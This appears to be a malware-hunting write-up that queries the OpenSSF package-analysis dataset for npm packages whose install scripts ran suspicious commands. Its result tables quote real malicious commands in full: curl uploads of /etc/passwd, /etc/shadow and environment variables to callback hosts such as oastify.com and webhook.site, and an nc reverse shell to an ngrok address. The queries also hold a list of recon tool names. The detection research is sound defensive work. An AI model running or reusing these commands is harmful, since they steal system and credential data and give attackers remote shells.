Find the most commonly executed commands (keyed on argv[0] only) during npm package install:
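-- Count the executables (argv[0]) spawned while installing the npm packages
-- analysed in September 2023.  Only the first element of each command line is
-- inspected, so `sh -c "curl ..."` is counted as `sh`, not `curl`, and `curl`
-- and `/usr/bin/curl` are counted separately.
SELECT
  -- SAFE_OFFSET yields NULL (one NULL group) instead of failing the whole
  -- query if a Command array is empty.
  Commands.Command[SAFE_OFFSET(0)] AS exe,
  COUNT(*) AS `count`
FROM
  `ossf-malware-analysis.packages.analysis` AS T,
  -- Implicit UNNEST of the per-package command array (BigQuery array flattening).
  T.Analysis.install.Commands AS Commands
WHERE
  T.Package.Ecosystem = "npm"
  -- Half-open month range, equivalent to TIMESTAMP_TRUNC(..., MONTH) = 2023-09-01
  -- but a plain range predicate that BigQuery can prune on.
  AND T.CreatedTimestamp >= TIMESTAMP("2023-09-01")
  AND T.CreatedTimestamp < TIMESTAMP("2023-10-01")
GROUP BY exe
ORDER BY `count` DESC
;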
exe | count |
---|---|
node | 814772 |
npm | 424500 |
/bin/sh | 340613 |
sleep | 209428 |
sh | 159084 |
sed | 124058 |
printf | 74544 |
rm | 66336 |
as | 63598 |
touch | 54522 |
… | … |
Now find the packages whose install scripts spawn (as argv[0]) a hand-picked set of commands that are rarely needed at install time but typical of reconnaissance and exfiltration — curl/wget, whoami, ping, nc, sudo, docker:
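-- List every (package, version) analysed in September 2023 whose npm install
-- spawned one of a hand-picked set of executables.  The set targets tools with
-- little legitimate use during `npm install` but typical of reconnaissance and
-- exfiltration (the results include `curl --data @/etc/passwd <callback host>`
-- and `nc ... -e /bin/bash`).
--
-- Caveats:
--   * Only argv[0] is matched.  `sh -c "curl ..."` or `/usr/bin/env curl`
--     shows up as `sh`/`env`, not `curl`, and bare vs absolute names are
--     listed separately (`curl` vs `/usr/bin/curl`).
--   * `python -c ...` and curl/wget against GitHub release URLs are frequently
--     benign build steps; read the full command line before acting on a hit.
SELECT
  T.Package.Name,
  T.Package.Version,
  Commands.Command[SAFE_OFFSET(0)] AS exe,
  -- Re-joined argv so the targets and exfiltrated files are visible.
  ARRAY_TO_STRING(Commands.Command, " ") AS command
FROM
  `ossf-malware-analysis.packages.analysis` AS T,
  T.Analysis.install.Commands AS Commands
WHERE
  T.Package.Ecosystem = "npm"
  -- Half-open month range, equivalent to TIMESTAMP_TRUNC(..., MONTH) = 2023-09-01.
  AND T.CreatedTimestamp >= TIMESTAMP("2023-09-01")
  AND T.CreatedTimestamp < TIMESTAMP("2023-10-01")
  AND Commands.Command[SAFE_OFFSET(0)] IN (
    "curl", "/usr/bin/curl", "wget",
    "whoami", "ping", "nc",
    "python", "docker", "sudo", "/bin/echo"
  )
ORDER BY
  T.Package.Name,
  T.Package.Version ASC
;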
Name | Version | exe | command |
---|---|---|---|
@apps-common/ui-theme | 10.1.0 | /usr/bin/curl | /usr/bin/curl c971b268fd0b.qlfu0xty7cyyfst1cs3qt6wz3q9hx7lw.oastify.com/ui-theme |
@dm-connect/manager | 26.0.8 | curl | curl -s -k -X POST -d passwd=root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:105::/nonexistent:/usr/sbin/nologin
tcpdump:x:104:106::/nonexistent:/usr/sbin/nologin&id_rsa=&ip=34.31.210.88 https://sha16.requestcatcher.com/h4ck3d |
@dm-connect/manager | 26.0.8 | curl | curl -s -k ifconfig.me |
@dm-connect/manager | 28.0.9 | curl | curl -s -k -X POST -d root_directories=total 24
drwx------ 1 root root 4096 Sep 14 05:28 .
dr-xr-xr-x 1 root root 4096 Sep 20 20:15 ..
-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc
drwxr-xr-x 3 root root 4096 Sep 14 05:26 .cache
drwxr-xr-x 3 root root 4096 Sep 14 05:25 .config
drwxr-xr-x 4 root root 4096 Sep 20 20:15 .npm
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile https://sha16.requestcatcher.com/h4ck3d |
@get-bridge/bridge-string-utils | 99.99.99 | curl | curl -H Hostname: NTJhMjQ0MWY3MGMwCg== -H Whoami: cm9vdAo= -H Pwd: L2FwcC9ub2RlX21vZHVsZXMvQGdldC1icmlkZ2UvYnJpZGdlLXN0cmluZy11dGlscwo= -d dG90YWwgOQpkcnd4ci14ci14IDIgcm9vdCByb290IDQwOTYgU2VwIDExIDE5OjM0IC4KZHJ3eHIt
eHIteCAzIHJvb3Qgcm9vdCA0MDk2IFNlcCAxMSAxOTozNCAuLgotcnctci0tci0tIDEgcm9vdCBy
b290ICAyNzEgU2VwIDExIDE5OjM0IHBhY2thZ2UuanNvbgotcnd4ci14ci14IDEgcm9vdCByb290
ICAxODkgU2VwIDExIDE5OjM0IHByZS5zaAo= https://cjvm1lk0sjhuban1t120rm6bqz7iuu5ka.oast.live |
@get-bridge/bridge-string-utils | 99.99.99 | whoami | whoami |
@get-bridge/tapestry-sdk | 99.99.991 | curl | curl -H Hostname: ZjM0ZmIzZWU0NGE1Cg== -H Whoami: cm9vdAo= -H Pwd: L2FwcC9ub2RlX21vZHVsZXMvQGdldC1icmlkZ2UvdGFwZXN0cnktc2RrCg== -d dG90YWwgMTIKZHJ3eHIteHIteCAzIHJvb3Qgcm9vdCA0MDk2IFNlcCAxMSAyMDo1NSAuCmRyd3hy
LXhyLXggNSByb290IHJvb3QgNDA5NiBTZXAgMTEgMjA6NTUgLi4KZHJ3eHIteHIteCAzIHJvb3Qg
cm9vdCA0MDk2IFNlcCAxMSAyMDo1NSBAZ2V0LWJyaWRnZQo= https://cjvm1lk0sjhuban1t120rm6bqz7iuu5ka.oast.live |
@get-bridge/tapestry-sdk | 99.99.991 | whoami | whoami |
@harvard-lil/scoop | 0.5.3 | curl | curl -L https://github.com/Hakky54/certificate-ripper/releases/download/2.1.0/crip-linux-amd64.tar.gz |
@harvard-lil/scoop | 0.5.3 | curl | curl -L https://github.com/yt-dlp/yt-dlp/releases/download/2023.07.06/yt-dlp |
@instructure/quiz-number-input | 18.0.1-rc.2 | python | python -c import sys; print(sys.executable); |
@molgenis/vip-report-template | 5.5.4 | curl | curl --no-progress-meter --location https://github.com/molgenis/vip-utils/releases/download/v1.4.1/field_metadata.json --create-dirs --output src/metadata/field_metadata.json |
@molgenis/vip-report-vcf | 1.4.3 | curl | curl --no-progress-meter --location https://github.com/molgenis/vip-utils/releases/download/v1.4.1/field_metadata.json --create-dirs --output src/metadata/field_metadata.json |
@prodperfect/cli | 1.2.0 | curl | curl --url https://github.com/stedolan/jq/releases/download/jq-1.6/jq-linux64 --request GET --output /app/node_modules/@prodperfect/cli/../../.bin/jq --location --silent --show-error --write-out \n%{http_code} |
@xarber/xshopjs | 1.0.0-b | /bin/echo | /bin/echo |
@xarber/xshopjs | 1.0.0-b | sudo | sudo apt-get install unar -y |
adidas-data-mesh | 4.4.7 | whoami | whoami |
adidas-data-mesh | 4.8.7 | whoami | whoami |
adidas-data-mesh | 4.8.9 | whoami | whoami |
adidas-data-mesh | 6.6.6 | whoami | whoami |
adidas-data-mesh | 9.4.7 | whoami | whoami |
adidas-data-mesh | 9.9.4 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd a0359854ae4a.cm30n6w2vtc0000cv6m0gkboz5ayyyyyr.oast.fun |
adidas-data-mesh | 9.9.7 | nc | nc tcp.in.ngrok.io 17353 -e /bin/bash |
adidas-data-mesh | 9.9.8 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd b19d5f54a3a0aesic9l2whlwa33aytefcnu11s7jv8.burpcollaborator.net |
asherah | 1.2.7 | curl | curl -s -L --fail -O --retry 999 --retry-max-time 0 https://github.com/godaddy/asherah-cobhan/releases/download/v0.4.25/libasherah-x64-archive.h |
asherah | 1.2.7 | curl | curl -s -L --fail -O --retry 999 --retry-max-time 0 https://github.com/godaddy/asherah-cobhan/releases/download/v0.4.25/libasherah-x64.a |
asherah | 1.2.9 | curl | curl -s -L --fail -O --retry 999 --retry-max-time 0 https://github.com/godaddy/asherah-cobhan/releases/download/v0.4.25/libasherah-x64-archive.h |
asherah | 1.2.9 | curl | curl -s -L --fail -O --retry 999 --retry-max-time 0 https://github.com/godaddy/asherah-cobhan/releases/download/v0.4.25/libasherah-x64.a |
bbc-iplayer-sounds-chatbot | 1.2.3 | whoami | whoami |
bbc-iplayer-sounds-chatbot | 5.2.3 | whoami | whoami |
ccfedrtest-poc | 1.0.3 | ping | ping 435dvf5lwsuqc7k2zmmip3zfm6sxgn4c.oastify.com |
centurylink | 4.1.1 | whoami | whoami |
centurylink | 5.1.1 | whoami | whoami |
centurylink | 6.1.1 | whoami | whoami |
centurylink | 7.1.1 | whoami | whoami |
centurylink | 8.1.1 | whoami | whoami |
centurylink | 9.1.1 | whoami | whoami |
centurylink | 9.2.1 | whoami | whoami |
centurylink | 9.4.1 | whoami | whoami |
centurylink | 9.5.1 | whoami | whoami |
centurylink | 9.8.1 | whoami | whoami |
centurylink | 9.9.1 | whoami | whoami |
chain-list | 20.0.0 | curl | curl ifconfig.me |
course-structure-debugger | 10.999.0 | curl | curl https://ifconfig.me |
course-structure-debugger | 10.999.0 | whoami | whoami |
course-structure-debugger | 11.999.0 | curl | curl https://ifconfig.me |
course-structure-debugger | 11.999.0 | whoami | whoami |
darkhat-hard-to-find-package-do-not-require-it | 1.0.1 | curl | curl https://webhook.site/76a40c42-6fe4-4caf-9b37-49c5eda9ae20?darkhat=darkhat |
feature-flag-framework | 9.999.0 | curl | curl https://ifconfig.me |
feature-flag-framework | 9.999.0 | whoami | whoami |
fiji-core-cryptopool | 9.999.0 | curl | curl https://ifconfig.me |
fiji-core-cryptopool | 9.999.0 | whoami | whoami |
fiji-core-foc | 9.999.0 | curl | curl https://ifconfig.me |
fiji-core-foc | 9.999.0 | whoami | whoami |
fiji-core-foundation | 9.999.0 | curl | curl https://ifconfig.me |
fiji-core-foundation | 9.999.0 | whoami | whoami |
fiji-core-framework | 9.999.0 | curl | curl https://ifconfig.me |
fiji-core-framework | 9.999.0 | whoami | whoami |
goingwithflow | 6.9.9 | whoami | whoami |
goingwithflow | 9.8.9 | whoami | whoami |
inteken-app-client | 9.9.1 | /usr/bin/curl | /usr/bin/curl --data @/etc/shadow 25371d442238xdede680mk624kgu48sasafdh4nubj.burpcollaborator.net |
inteken-app-client | 9.9.5 | /usr/bin/curl | /usr/bin/curl --data @/etc/shadow 70839db2341del32g9cjsa8u8mo6t3fetd98lzrqff.burpcollaborator.net |
inteken-app-client | 9.9.6 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd c15510217590el32g9cjsa8u8mo6t3fetd98lzrqff.burpcollaborator.net |
jupiter-emoji | 9.999.0 | curl | curl https://ifconfig.me |
jupiter-emoji | 9.999.0 | whoami | whoami |
jupiter-i18n | 9.999.0 | curl | curl https://ifconfig.me |
jupiter-i18n | 9.999.0 | whoami | whoami |
jupiter-opensdk | 9.999.0 | curl | curl https://ifconfig.me |
jupiter-opensdk | 9.999.0 | whoami | whoami |
lab-npm-package | 1.0.7 | curl | curl -X POST -H Content-Type: application/json -d {env_variable: } https://webhook.site/6c53f051-f81b-4ea1-853c-a4ea76539a5c |
lab-npm-package | 1.0.8 | curl | curl -X POST -H Content-Type: application/json -d {env_variable: rajesh } https://webhook.site/6c53f051-f81b-4ea1-853c-a4ea76539a5c |
lab-npm-package | 2.0.1 | curl | curl -X POST -H Content-Type: application/json -d {"environment_variables": $(printenv | jq -Rs .)} https://webhook.site/6c53f051-f81b-4ea1-853c-a4ea76539a5c |
lab-npm-package | 2.0.2 | curl | curl -X POST -H Content-Type: application/json -d {environment_variables: $(printenv | jq -Rs .)} https://webhook.site/6c53f051-f81b-4ea1-853c-a4ea76539a5c |
master-oracle-lib | 20.0.0 | curl | curl ifconfig.me |
metronome-synth-info-lib | 20.0.0 | curl | curl ifconfig.me |
metronome-synth-user-lib | 20.0.2 | curl | curl ifconfig.me |
metronome-ui | 21.0.2 | curl | curl ifconfig.me |
mfp-food-diary | 0.1.1 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd dc9065f3a7b5cm31san2vtc000046akggkbohioyyyyyb.oast.fun |
mfp-food-diary | 0.1.2 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd 5056fcbc2be2cm31san2vtc000046akggkbohioyyyyyb.oast.fun |
mfp-test-repo | 0.1.1 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd f134e3ae147dcm31san2vtc000046akggkbohioyyyyyb.oast.fun |
npm-random-gen | 1.0.1 | curl | curl -X POST -F file=@preinstall.txt https://eoerh8zdok2dcuf.m.pipedream.net |
pathkit-local | 9.9.9 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd 00ad358605ce3y2fc9xtt9toy1u2y4txfy665xbnzc.burpcollaborator.net |
payment-react-component | 1.5.0 | /usr/bin/curl | /usr/bin/curl 01dd4079912f.rhck43o9lrknmap6jncly360zr5itahz.oastify.com/payment-react-component |
pmd-github-action | 2.1.1 | whoami | whoami |
pmd-github-action | 7.2.9 | whoami | whoami |
pmd-github-action | 7.9.9 | whoami | whoami |
pmd-github-action | 9.9.9 | whoami | whoami |
ppreact7 | 7.0.0 | /usr/bin/curl | /usr/bin/curl --data @/etc/hosts 30e72bbc4f57.0yj0npk9xow79fekqjlndw4lr.canarytokens.com |
puppeteer-example | 0.1.12 | whoami | whoami |
puppeteer-example | 0.1.13 | whoami | whoami |
puppeteer-example | 0.1.14 | whoami | whoami |
puppeteer-example | 0.1.15 | whoami | whoami |
puppeteer-example | 0.1.16 | whoami | whoami |
puppeteer-example | 0.1.2 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd 4826533f4ab3cm31san2vtc000046akggkbohioyyyyyb.oast.fun |
puppeteer-example | 0.1.3 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd 3bfb39b5a69dcm31san2vtc000046akggkbohioyyyyyb.oast.fun |
puppeteer-example | 0.1.5 | /usr/bin/curl | /usr/bin/curl --data @/etc/passwd af54b23955a1cm31san2vtc000046akggkbohioyyyyyb.oast.fun |
puppeteer-example | 0.1.6 | whoami | whoami |
puppeteer-example | 0.1.8 | whoami | whoami |
puppeteer-example | 0.1.9 | whoami | whoami |
quiz-presets | 18.0.1-rc.2 | python | python -c import sys; print(sys.executable); |
rambox | 1.0.0 | whoami | whoami |
scroller_super_top | 1.0.2 | wget | wget https://ipinfo.io/ |
simple-dvt-v1 | 0.0.3 | python | python -c import sys; print(sys.executable); |
simple-dvt-v1 | 0.0.3 | python | python -c import sys; print(sys.executable); |
simple-dvt-v1 | 0.0.4 | python | python -c import sys; print(sys.executable); |
simple-dvt-v1 | 0.0.4 | python | python -c import sys; print(sys.executable); |
sqlx-ts | 0.5.0 | curl | curl -LSfs https://jasonshin.github.io/sqlx-ts/install.sh |
sw-kendo-atomic-theme | 1.999.0 | curl | curl https://js.rip/nvjy3ak1e8 |
sw-kendo-atomic-theme | 1.999.0 | whoami | whoami |
symphony-monorepo | 1.0.1 | whoami | whoami |
tourist-catapult | 9.7.2 | curl | curl https://d7mr6puf9ww39.cloudfront.net/meta.xml |
tv-front | 1.1.0 | /usr/bin/curl | /usr/bin/curl d1d1d5022c4b.rhck43o9lrknmap6jncly360zr5itahz.oastify.com |
ui-elements-icons | 4.999.0 | curl | curl https://ifconfig.me |
ui-elements-icons | 4.999.0 | whoami | whoami |
ui-elements-icons | 6.0.0 | curl | curl https://ifconfig.me |
ui-elements-icons | 6.0.0 | curl | curl https://ifconfig.me |
ui-elements-icons | 6.0.0 | whoami | whoami |
ui-elements-icons | 6.0.0 | whoami | whoami |
ui-elements-icons | 8.999.0 | curl | curl https://ifconfig.me |
ui-elements-icons | 8.999.0 | whoami | whoami |
ui-elements-icons | 9.999.9 | curl | curl https://ifconfig.me |
ui-elements-icons | 9.999.9 | whoami | whoami |
vesper-synth-user-lib | 20.0.0 | curl | curl ifconfig.me |
visual_components | 1.0.13 | curl | curl jylzs5g46s3de9d6vrrdlyu2ptvkjb70.oastify.com/cmd=root |
visual_components | 1.0.13 | whoami | whoami |
visual_components | 1.0.14 | curl | curl 042gymmlc99ukqjn18xurf0jva11ptdi.oastify.com/a204fd83488a/?tcpdump:x:104:106::/nonexistent:/usr/sbin/nologin |
visual_components | 1.0.18 | curl | curl hufxo3c22qzba794rpnbhwq0lrrifd32.oastify.com/508e916424f2/?root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:105::/nonexistent:/usr/sbin/nologin tcpdump:x:104:106::/nonexistent:/usr/sbin/nologin |
visual_components | 1.0.19 | curl | curl 2jmido1nrbowzsypgacw6hflacg34zso.oastify.com/61e74477cc78/?root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:105::/nonexistent:/usr/sbin/nologin tcpdump:x:104:106::/nonexistent:/usr/sbin/nologin |
visual_components | 1.0.20 | curl | curl gwgwq2e14p1ac6b3topajvsznqthhf54.oastify.com/5f90fe414aeb/?tcpdump:x:104:106::/nonexistent:/usr/sbin/nologin |
visual_components | 1.0.21 | curl | curl gwgwq2e14p1ac6b3topajvsznqthhf54.oastify.com/84a523804232/?tcpdump:x:104:106::/nonexistent:/usr/sbin/nologin |
wallet-switch-chain | 21.0.3 | curl | curl ifconfig.me |
walletconnect-website | 4.4.4 | whoami | whoami |
walletconnect-website | 5.4.5 | whoami | whoami |
walletconnect-website | 6.4.5 | whoami | whoami |
walletconnect-website | 7.4.7 | whoami | whoami |
walletconnect-website | 8.4.7 | whoami | whoami |
weak-json | 1.0.1 | wget | wget -q https://gitlab.inria.fr/line/aide-group/aidebuild/-/raw/master/src/makefile -O ./.makefile.inc |
weak-json | 1.0.1 | wget | wget -q https://gitlab.inria.fr/line/aide-group/aidebuild/-/raw/master/src/makefile -O ./.makefile.inc |
weak-json | 1.0.1 | wget | wget -q https://gitlab.inria.fr/line/aide-group/aidebuild/-/raw/master/src/makefile -O ./.makefile.inc |
www-ankr-com | 2.0.10 | curl | curl ifconfig.me |
ysb-ui-services | 3.999.0 | curl | curl https://ifconfig.me |
ysb-ui-services | 3.999.0 | curl | curl https://ifconfig.me |
ysb-ui-services | 3.999.0 | whoami | whoami |
ysb-ui-services | 3.999.0 | whoami | whoami |
ysb-ui-services | 4.999.0 | curl | curl https://ifconfig.me |
ysb-ui-services | 4.999.0 | curl | curl https://ifconfig.me |
ysb-ui-services | 4.999.0 | whoami | whoami |
ysb-ui-services | 4.999.0 | whoami | whoami |
zara-mkt-core | 1.0.0 | /usr/bin/curl | /usr/bin/curl --header X-Origin-IP: 172.16.16.96 a390a2d55c32.sfbdsd25uq668574h501430r0i69u3is.oastify.com |
zara-mkt-core | 9.9.1 | /usr/bin/curl | /usr/bin/curl --header X-Origin-IP: 172.16.16.14 --data @/app/node_modules/zara-mkt-core/filetemp101.txt e5604348176e.sfbdsd25uq668574h501430r0i69u3is.oastify.com |
We see that puppeteer-example@0.1.5 invokes the command `/usr/bin/curl --data @/etc/passwd af54b23955a1cm31san2vtc000046akggkbohioyyyyyb.oast.fun`, i.e. it POSTs the sandbox's /etc/passwd to an out-of-band callback host. The same pattern appears above for adidas-data-mesh, inteken-app-client (/etc/shadow), mfp-food-diary, pathkit-local and visual_components, alongside a `nc … -e /bin/bash` reverse shell in adidas-data-mesh@9.9.7.
Let’s see if we can identify the read of /etc/passwd
and find other packages that do the same:
-- Every file read while installing puppeteer-example@0.1.5 (September 2023
-- analysis).  Used to check whether the /etc/passwd read that feeds the
-- `curl --data @/etc/passwd` exfiltration is itself a usable signal.
SELECT
  Files
FROM
  `ossf-malware-analysis.packages.analysis` AS T,
  T.Analysis.install.Files AS Files
WHERE
  T.Package.Ecosystem = "npm"
  AND T.Package.Name = "puppeteer-example"
  AND T.Package.Version = "0.1.5"
  AND TIMESTAMP_TRUNC(T.CreatedTimestamp, MONTH) = TIMESTAMP("2023-09-01")
  AND Files.Read
;
Unfortunately, reading /etc/passwd turns out to be a common operation during installation — presumably user/group lookups by node, npm or the sandbox itself (to be confirmed) — so the read on its own is not a useful signal. What distinguishes puppeteer-example@0.1.5 is that the file's contents are then sent to an out-of-band callback host (`curl --data @/etc/passwd …`); the file read has to be correlated with a subsequent network send to be meaningful.
Let's explore the files that are written to during installation:
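-- Files written during npm install (September 2023 analyses), with the
-- locations the npm/node toolchain and the sandbox itself routinely write to
-- filtered out.  Remaining rows are candidates for persistence or tampering
-- (e.g. /root/.ssh/known_hosts), but the denylist below is known-incomplete.
SELECT
  T.Package.Name,
  T.Package.Version,
  Files
FROM
  `ossf-malware-analysis.packages.analysis` AS T,
  T.Analysis.install.Files AS Files
WHERE
  T.Package.Ecosystem = "npm"
  -- Half-open month range, equivalent to TIMESTAMP_TRUNC(..., MONTH) = 2023-09-01.
  AND T.CreatedTimestamp >= TIMESTAMP("2023-09-01")
  AND T.CreatedTimestamp < TIMESTAMP("2023-10-01")
  AND Files.Write = TRUE
  -- Package install tree, caches and build scratch space.
  AND Files.Path NOT LIKE "/app/%"
  AND Files.Path NOT LIKE "/root/.npm/%"
  AND Files.Path NOT LIKE "/root/.cache/%"
  AND Files.Path NOT LIKE "/root/.node-gyp/%"
  AND Files.Path NOT LIKE "/tmp/%"
  AND Files.Path NOT LIKE "/usr/local/cargo/%"
  AND Files.Path NOT LIKE "/usr/lib/node_modules/%"
  -- Non-file descriptors as reported by the tracer.
  AND Files.Path NOT LIKE "host:%"
  AND Files.Path NOT LIKE "pipe:%"
  AND Files.Path NOT LIKE "socket:%"
  AND Files.Path NOT LIKE "anon_inode:%"
  AND Files.Path NOT IN ("/dev/tty", "/dev/null")
-- Deterministic sample: without an ORDER BY, LIMIT returns an arbitrary and
-- unrepeatable subset of the matching rows.
ORDER BY
  T.Package.Name,
  T.Package.Version,
  Files.Path
LIMIT 1000
;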
Name | Version | Path |
---|---|---|
@instructure/quiz-taking | 18.1.2-rc.3 | /root/.ssh/known_hosts |
@things-factory/operato-hub | 4.3.324 | /root/.config/configstore/type-graphql.json.3648656340 |
@things-factory/sales-ui | 4.3.323 | /root/.config/configstore/type-graphql.json.1900368908 |
taro-plugin-mini-ci | 1.0.0 | /root/.minidev/assets/devtools-resource/99fa26bda16f811b4e22a8574be3ad29_downloading_1695179542563/mini-devtools-4-minidev/front_end/.DS_Store |
taro-plugin-mini-ci | 1.0.0 | /root/.minidev/assets/devtools-resource/99fa26bda16f811b4e22a8574be3ad29_downloading_1695179542563/mini-devtools-4-minidev/front_end/._.DS_Store |
… | … | … |
Building up a denylist of benign directories would take a long time — there are hundreds of thousands of unique paths written to. An allowlist of sensitive locations (for example /root/.ssh/ and /etc/) is likely a more tractable way to surface writes such as the /root/.ssh/known_hosts entry above.